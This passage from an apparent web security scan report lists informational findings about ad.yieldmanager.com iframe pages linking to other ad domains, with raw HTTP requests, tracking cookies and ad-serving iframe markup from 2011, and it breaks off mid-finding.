Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0113.rm.sp2
Set-Cookie: ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!(=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:44:53 GMT
Set-Cookie: vuday1=BgvR+4M6Eq!79C8-g-VV; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:44:53 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:53 GMT
Pragma: no-cache
Content-Length: 1418
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=615918&bli=1634623&exPub=24284&city=Dallas&acp=2.8980&rnd=1315313093&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGNkVuP2jAQhf9MnyoSx5ckziKrMiQsAbKBAFrCC8oNTO7KZVP664sKW23fOg%2DeY43ON%2EIxxOMzQfhMEyUJaYhRBMcQI5xEqhIa2kgZj8cYaqqhalgdHZZ7k7%2E1%2D1c%2D%2DbmxW%2E6nJiSwLg%2E5OO3nReF84ObU3Vjz51wv9ovnUKbeP6avgP%2EQZrzgn3vufXhY8s3HbJ3ak78Ak99cc5G%2DmQuxet8Q1%2EQ7ZzfLnSkUrhmL1S4ix12cOe9H4Zh77D85dz8bia6rXwC45FUY5HLQxPItEFUlR1UBtvYrg2ojzqpGKHCYTnWKsQwJISpE6l0gA1IDyZAqGlIgMFlbV03Xgi1DCkKKgRBBLyvPmoLTLe8Y7w92kWrDLfOCrNevay6Cib%2EbNv6RAJ%2E5fO66wDqsGcRQxXcEJWDFZtQUQ7G015Zec69Od7k8pBvbc0SsB5lazML7B9jWEUyYJbbJukvpOfIlsHhgIFYoMTRKiQKWrJuHp%2ExD1R1%2DuYr217YuFiIbAGca0iAiBHhMAd%2D%2EfebyeM%2DXTMpzDsK8uoBW9F1cDeUpqpoyaUBdtR3ortlVCoMmTBqpSYrgWrZSXyZFnVe3JJaCMpbaIP7RNyW7g6Sh1gjBvwHzxsfX%2C&url=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.37. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313084968840&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jnbi3cd/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320284/L=F8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ/B=FBSePtj8fcY-/J=1315313084968840/K=tHb_lv57MAgihszSpmJhkw/A=6261245/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#F!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!3:c!!!!#=3f8T!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4dM!!!!#=3]fh!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!#=3]fx!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!#=3f8^!
$?i5!!!!%=3`c_"; ih="b!!!!*!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!'=3f8_!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!3Eo4!!!!#=3f.'!4ZV5!!!!#=3f8^"; vuday1=BgvR*4M6Eq!79C8M#n45; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!!E)(!$XwW!1n,b!#t3o~!#Ds0$To(1!w1K*!%4=*!#!8+!$]7n~~~~~=3f8_~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; liday1=*YKlx8SkUq!79C8gM+s%; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:55 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0192.rm.sp2
Set-Cookie: ih="b!!!!+!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!4=3f8a!2(Qv!!!!#=3^]V!2reF!!!!#=3]gE!38Yq!!!!#=3f8a!3Eo4!!!!#=3f.'!4ZV5!!!!$=3f8_"; path=/; expires=Thu, 05-Sep-2013 12:44:55 GMT
Set-Cookie: vuday1=BgvR5!79C8'$[q]; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: lifb=BcN3V!yANGM5Jkn$AVp-2AQ4:; path=/; expires=Tue, 06-Sep-2011 16:44:55 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:55 GMT
Pragma: no-cache
Content-Length: 2706
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9982306);}
</script><IFRAME SRC="http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313095?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://t.invitemedia.com/track_click?auctionID=13153130951610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=http://ad.doubleclick.net/jump/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1315313095?">
<IMG SRC="http://ad.doubleclick.net/ad/N3220.aod-invite.comOX15921/B5642080.11;abr=!ie4;abr=!ie5;sz=728x90;pc=[TPAS_ID];ord=1315313095?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
</NOSCRIPT>
</IFRAME> <img src='http://t.invitemedia.com/track_imp?partnerID=77&campID=106300&crID=126548&auctionID=13153130951610984-126548&cost=2.7600&pubICode=2145116&pub=24284&url=http%3A%2F%2Fsports%2Eyahoo%2Ecom%2Fnfl%2Fblog%2Fshutdown%5Fcorner%2Fpost%2Ftiki%2Dbarber%2Dremains%2Dunemployed%2Dand%2Dsad%3Furn%3Dnfl%2Dwp6443' width='1' height='1' border='0' /><iframe src="http://pixel.invitemedia.com/data_sync?partner_id=77" height="1" frameborder="0" width="1" style="display: none;" scrolling="no" marginheight="0" marginwidth="0"></iframe>
...[SNIP]...

15.38. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /iframe3?5jBaAP-hGABxQIsAAAAAAB4aEgAAAAAAAAAEAAIAAAAAAAYABQADCBs1BAAAAAAAfG8GAAAAAAA.8RgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADLJAIAAAAAAAIAAwAAAAAAzczMzMxMC0AAAAAAAAAUQM3MzMzMTAtAAAAAAAAAFEDNzMzMzEwLQAAAAAAAABRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACVc.WrdvuuCl-qJ5SfXXwaYLy4SZmf62flH2cNAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15tk89q4f%2FM%3D787833.14445123.14291890.1641906%2FD%3Dclassreal%2FS%3D750052199%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320597%2FL%3D_QVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u%2FB%3DOrXDQmKJiR8-%2FJ%3D1315313397366429%2FK%3DiwgPsw1Pz1yP_tp9hGoa9Q%2FA%3D6261242%2FR%3D0%2F%2A%24,http%3A%2F%2Frealestate.yahoo.com%2Fsearch%2Fnew_york%2Fnew_york%2Fhomes-for-sale%3Ftypebak%3Drealestate%26p%3D10010%26type%3Dclassified%26pricelow%3D%26pricehigh%3D%26bedroomlow%3D%26bathroomlow%3D%26search%3Dsearch,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445123%26Z%3D300x250%26_PVID%3D%255fQVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u%26_salt%3D3072436167%26cb%3D1315313397366429%26i%3D140491%26r%3D0,ba32b4c2-d886-11e0-b73e-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=_QVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u&ad_type=iframe&ad_size=300x250&site=140491&section_code=14445123&cb=1315313397366429&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15tk89q4f/M=787833.14445123.14291890.1641906/D=classreal/S=750052199:LREC/Y=YAHOO/EXP=1315320597/L=_QVXLWKJhxXpARpjTl.wjReUMhd7ak5mFvUABM3u/B=OrXDQmKJiR8-/J=1315313397366429/K=iwgPsw1Pz1yP_tp9hGoa9Q/A=6261242/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!
$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r#BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jX5>i; lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: vuday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0164.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!*=3f=@!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:50:03 GMT
Set-Cookie: vuday1=oyOxB!79C8GkUST; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$YI2!1n,b!#t3o!!H<'!!ZH)$To(3!w1K*!!J0y!!_Cl!$]7n~~~~~=3f=@~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; path=/; expires=Thu, 05-Sep-2013 12:50:03 GMT
Set-Cookie: uid=uid=bd3d86f6-d886-11e0-929f-78e7d1fad4b4&_hmacv=1&_salt=2635402791&_keyid=k1&_hmac=027f7e4536e72f626ca7dee1d1a1539a87bc81c5; path=/; expires=Thu, 06-Oct-2011 12:50:03 GMT
Set-Cookie: liday1=8SkUp!79C8Jh]Hw; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:50:03 GMT
Pragma: no-cache
Content-Length: 1497
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(9126001);}
</script><iframe name="turn_ad_call_frame" width="300" height="250" frameborder="0" src="http://ad.turn.com/server/ads.htm?&pub=2701141&code=17152424&cch=6872266&l=300x250&nonjs=1&sli=421756&bli=1634623&exPub=54785&city=Dallas&acp=3.4125&rnd=1315313403&3c=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F3%2CeAGVUF1zojAU%2ETM7PuwoIYSv1MnshGpZERSobrUvToBgUFwosEX99avF1n3dPOSeezLnnnMD0TAyZEU1o4inqZ6kkTGESEE8xrEWJX15OBwiXcGGqRqK1td2FqP%2DQNjUOgaTmn4cS2XjbQcv95jSya1ZUyugo0erhtaNSW3TvkHJDO%2DiG%2EcfZeQ6Xz4Xv7aTvscrx99NPu0otR3hnZ1sZnsn9yVQ56N14y2ecu8RZrPzLHcXsfq6SPbeYn18PSyV%2DT0B6YumKR8A2OZFxHKJVYl0YqIopLg4gOeJTaDW7E38pqbAI4ZpmAhJUFVVDSpXoGBoYlmCugqxrIMRiXNW1xVnOXgmhibLmgIxfnDD8SNYkzX9OZ%2DD8conEEENKbKGDeCSTfBr5b5MHXFclTQsd4tcanchX3oiMdheOzy9L6nloT%2EAIvNqNQoOUycLzQFwujEQIWwgXb%2DEAVOStVu%2EbqF%2Ehid%2E05RY2AXDAaBEV3SoqAoIiQy%2Df%2Evc%2DxqV1w1r%2DD9715xVsQC%2Eebs5FdX%2DDkRx4PUgLapBfZH9aE4lj9ie3If0SgJlGcq961P3GVma8aRXVlnM86IlHRLZVpBexJOqKA4fdMQa8dV0AUhX%2EgIkp9W7%2C&url=http%3A%2F%2Frealestate%2Eyahoo%2Ecom%2Fsearch%2Fnew%5Fyork%2Fnew%5Fyork%2Fhomes%2Dfor%2Dsale%3Ftypebak%3Drealestate%26p%3D10010%26type%3Dclassified%26pricelow%3D%26pricehigh%3D%26bedroomlow%3D%26bathroomlow%3D%26search%3Dsearch" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"></iframe>
...[SNIP]...

15.39. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

